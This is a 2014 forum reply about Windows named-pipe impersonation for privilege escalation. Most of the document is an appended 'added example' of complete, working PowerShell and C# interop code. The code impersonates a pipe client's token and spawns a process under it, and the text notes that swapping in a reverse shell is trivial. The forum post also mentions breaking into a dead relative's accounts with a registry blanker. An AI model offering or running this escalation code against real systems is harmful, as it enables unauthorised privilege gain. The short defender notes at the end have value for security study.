  #28  
Old 05-20-2014, 06:24 PM
August
Fire Giant


Join Date: Sep 2010
Posts: 703

Quote:
Originally Posted by r00t
You can hack windows rather easily without knowing the root password or stealing the hash from memory (lol windows unsalted passwords 2014)

Basically create a named pipe from something with system level privileges, impersonate the pipe, open the thread token, and then spawn a reverse shell with it.

Sources:
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx
http://msdn.microsoft.com/en-us/libr...(v=vs.85).aspx
Isn't this logic flawed with the 'create a named pipe from something with system level privileges'? You don't need to hack a box you're on if you already have system level privileges.

A much easier method is to just use a registry blanker. It's how I got into all my dad's stuff after he died.
__________________
Tomtee Weewere- 22 ENC
Pizzatime - 51 SHM
Prehistoric Turtlesaurus - 51 MNK
Scientist - 37 ROG
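The following is an added example, not code from either poster, of the named-pipe impersonation technique r00t's quoted post is describing, with the roles stated the way the Win32 API actually has them: the attacker's own (low-privilege) process creates the pipe and acts as the server, the process that connects to it is the client, and ImpersonateNamedPipeClient lets the server thread take on the client's token. Nothing here requires already being SYSTEM, which is the misreading behind the "create a named pipe from something with system level privileges" wording; what the caller does need is SeImpersonatePrivilege (held by service accounts and elevated administrators), since without it the call only yields an identification-level token that CreateProcessWithTokenW will not accept. Getting a SYSTEM-level process to open the pipe is the part that needs a foothold and is deliberately not shown; for a test, open the pipe from a second console and the spawned cmd.exe will run as whatever account that console used. Assumptions: Windows PowerShell 5.1 (the PipeSecurity constructor below is .NET Framework), the illustrative pipe name `imp_demo`, and cmd.exe standing in for the post's reverse shell.

```powershell
# Added example (not from the thread): named-pipe impersonation on Windows.
# Assumes Windows PowerShell 5.1 and a caller holding SeImpersonatePrivilege.
# The pipe name and the spawned command are illustrative choices.

$src = @'
using System;
using System.Runtime.InteropServices;

public static class PipeImp
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public int cb;
        public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess, hThread;
        public int dwProcessId, dwThreadId;
    }

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe);

    [DllImport("kernel32.dll")]
    public static extern IntPtr GetCurrentThread();

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenThreadToken(IntPtr ThreadHandle, uint DesiredAccess,
        bool OpenAsSelf, out IntPtr TokenHandle);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess,
        IntPtr lpTokenAttributes, int ImpersonationLevel, int TokenType, out IntPtr phNewToken);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool RevertToSelf();

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithTokenW(IntPtr hToken, uint dwLogonFlags,
        string lpApplicationName, string lpCommandLine, uint dwCreationFlags,
        IntPtr lpEnvironment, string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
'@
Add-Type -TypeDefinition $src

function Fail($api) { throw "$api failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }

$pipeName = 'imp_demo'   # illustrative name, not from the post

# The default pipe DACL gives Everyone read only; grant write so any local client
# can send the byte the server must read before it may impersonate.
$sec = [System.IO.Pipes.PipeSecurity]::new()
$sec.AddAccessRule([System.IO.Pipes.PipeAccessRule]::new('Everyone',
    [System.IO.Pipes.PipeAccessRights]::ReadWrite,
    [System.Security.AccessControl.AccessControlType]::Allow))

# 1. Create the pipe server in OUR process; the privileged process is the client.
$pipe = [System.IO.Pipes.NamedPipeServerStream]::new($pipeName,
    [System.IO.Pipes.PipeDirection]::InOut, 1,
    [System.IO.Pipes.PipeTransmissionMode]::Byte,
    [System.IO.Pipes.PipeOptions]::None, 4096, 4096, $sec)
Write-Host "Waiting for a client to open \\.\pipe\$pipeName ..."
$pipe.WaitForConnection()

# ImpersonateNamedPipeClient fails with ERROR_CANNOT_IMPERSONATE (1368) if the server
# has not read anything from the client yet, so consume one byte first.
$null = $pipe.ReadByte()

# 2. Impersonate the client: this thread now runs under the client's token.
$hPipe = $pipe.SafePipeHandle.DangerousGetHandle()
if (-not [PipeImp]::ImpersonateNamedPipeClient($hPipe)) { Fail 'ImpersonateNamedPipeClient' }
Write-Host "Impersonating: $([Security.Principal.WindowsIdentity]::GetCurrent().Name)"

# 3. Open the impersonation token that now sits on the thread.
$TOKEN_ALL_ACCESS = 0xF01FF
$hThreadToken = [IntPtr]::Zero
if (-not [PipeImp]::OpenThreadToken([PipeImp]::GetCurrentThread(), $TOKEN_ALL_ACCESS, $true, [ref]$hThreadToken)) {
    Fail 'OpenThreadToken'
}

# 4. CreateProcessWithTokenW needs a primary token: duplicate it
#    (SecurityImpersonation = 2, TokenPrimary = 1), then drop the impersonation.
$hPrimary = [IntPtr]::Zero
if (-not [PipeImp]::DuplicateTokenEx($hThreadToken, $TOKEN_ALL_ACCESS, [IntPtr]::Zero, 2, 1, [ref]$hPrimary)) {
    Fail 'DuplicateTokenEx'
}
$null = [PipeImp]::RevertToSelf()

# 5. Spawn a process under the client's token (plain cmd.exe here; the post's
#    reverse shell would just be a different command line).
$si = [PipeImp+STARTUPINFO]::new()
$si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
$pi = [PipeImp+PROCESS_INFORMATION]::new()
$LOGON_WITH_PROFILE = 1
$CREATE_NEW_CONSOLE = 0x10
if (-not [PipeImp]::CreateProcessWithTokenW($hPrimary, $LOGON_WITH_PROFILE,
        'C:\Windows\System32\cmd.exe', $null, $CREATE_NEW_CONSOLE, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) {
    Fail 'CreateProcessWithTokenW'
}
Write-Host "Spawned cmd.exe as PID $($pi.dwProcessId) under the client's token"

foreach ($h in $hThreadToken, $hPrimary, $pi.hProcess, $pi.hThread) { $null = [PipeImp]::CloseHandle($h) }
$pipe.Dispose()
```

Two things worth noting from the defender's side. First, the whole chain stands or falls on SeImpersonatePrivilege: a process without it can still create the pipe and call ImpersonateNamedPipeClient, but the token it gets is identification-level only and step 5 fails, which is why that privilege, not "already being SYSTEM", is what matters in an escalation review. Second, because any process can create a pipe server by name, a privileged client that connects to a pipe it did not create should open it with SECURITY_IDENTIFICATION (or SECURITY_ANONYMOUS) in the CreateFile flags, which caps what a squatting server can do with the connection to exactly what this example needs and is denied.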